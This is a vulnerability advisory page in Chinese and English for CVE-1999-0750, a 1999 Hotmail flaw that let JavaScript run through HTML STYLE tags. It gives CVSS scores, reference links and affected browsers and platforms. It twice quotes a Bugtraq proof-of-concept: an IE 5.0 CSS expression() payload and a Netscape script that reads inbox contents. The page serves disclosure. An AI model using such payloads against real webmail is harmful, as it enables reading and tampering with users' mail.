CVE-1999-0750
CVSS5.1
发布时间 :1999-09-13 00:00:00
修订时间 :2008-09-09 08:35:19
NMCES    

[原文]Hotmail allows Javascript to be executed via the HTML STYLE tag, allowing remote attackers to execute commands on the user's Hotmail account.


[CNNVD]Hotmail Javascript STYLE漏洞(CNNVD-199909-023)

        Hotmail利用HTML STYLE标签执行Javascript。远程攻击者可以在用户的Hotmail账户上执行命令。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0750
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0750
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199909-023
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/630
(UNKNOWN)  BID  630

- 漏洞信息

Hotmail Javascript STYLE漏洞
中危 输入验证
1999-09-13 00:00:00 2005-10-20 00:00:00
远程  
        Hotmail利用HTML STYLE标签执行Javascript。远程攻击者可以在用户的Hotmail账户上执行命令。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (19492)

MS IE 5.0,Netscape Communicator 4.0/4.5/4.6 Javascript STYLE Vulnerability (EDBID:19492)
multiple remote
1999-09-13 Verified
0 Georgi Guninski
N/A [点击下载]
Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4,Netscape Communicator 4.0/4.5/4.6 Javascript STYLE Vulnerability

source: http://www.securityfocus.com/bid/630/info

The HTML STYLE command can be used to embed Javascript into Hotmail email messages. The STYLE tag circumvents current methods employed by Hotmail to disable Javascript from email messages. When viewed by a Microsoft IE 5.0 or Netscape Navigator 4.X browser, the Javascript in the email may execute various commands on the viewer's mailbox. The commands could take various actions on the user's inbox, including: reading email, deleting email, or prompting users to re-enter their password in a trojan application.


The code that must be embeded in a HTML email message is:
For IE 5.0:

<P STYLE="left:expression(eval('alert(\'JavaScript is
executed\');window.close()'))" >

For Netscape Communicator:

<STYLE TYPE="text/javascript">
alert('JavaScript is executed');
a=window.open(document.links[2]);
setTimeout('alert(\'The first message in your Inbox is from:
\'+a.document.links[26].text)',20000);
</STYLE> 		

- 漏洞信息

Hotmail Javascript STYLE Vulnerability
Input Validation Error 630
Yes No
1999-09-13 12:00:00 2009-07-11 12:56:00
This vulnerability was posted to Bugtraq by Georgi Guninski <joro@nat.bg>

- 受影响的程序版本

Netscape Communicator 4.6
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- S.u.S.E. Linux 7.0
- SCO eDesktop 2.4
- SCO eServer 2.3
Netscape Communicator 4.5
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0
- Conectiva Linux 3.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- Mandriva Linux Mandrake 6.1
- Mandriva Linux Mandrake 6.0
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- S.u.S.E. Linux 7.0
- SCO eDesktop 2.4
- SCO eServer 2.3
Netscape Communicator 4.0
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0
- Conectiva Linux 3.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- Mandriva Linux Mandrake 6.1
- Mandriva Linux Mandrake 6.0
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- S.u.S.E. Linux 7.0
- SCO eDesktop 2.4
- SCO eServer 2.3
Microsoft Internet Explorer 5.0 for Windows NT 4
+ Microsoft Windows NT 4.0
+ Microsoft Windows NT 4.0
Microsoft Internet Explorer 5.0 for Windows 98
+ Microsoft Windows 98
+ Microsoft Windows 98
Microsoft Internet Explorer 5.0 for Windows 95
+ Microsoft Windows 95
+ Microsoft Windows 95
Microsoft Internet Explorer 5.0 for Windows 2000
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
Microsoft Hotmail

- 漏洞讨论

The HTML STYLE command can be used to embed Javascript into Hotmail email messages. The STYLE tag circumvents current methods employed by Hotmail to disable Javascript from email messages. When viewed by a Microsoft IE 5.0 or Netscape Navigator 4.X browser, the Javascript in the email may execute various commands on the viewer's mailbox. The commands could take various actions on the user's inbox, including: reading email, deleting email, or prompting users to re-enter their password in a trojan application.

- 漏洞利用

From Georgi Guninski's &lt;joro@nat.bg&gt; post to Bugtraq:

The code that must be embeded in a HTML email message is:
For IE 5.0:

&amp;lt;P STYLE="left:expression(eval('alert(\'JavaScript is
executed\');window.close()'))" &amp;gt;

For Netscape Communicator:

&amp;lt;STYLE TYPE="text/javascript"&amp;gt;
alert('JavaScript is executed');
a=window.open(document.links[2]);
setTimeout('alert(\'The first message in your Inbox is from:
\'+a.document.links[26].text)',20000);
&amp;lt;/STYLE&amp;gt;

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站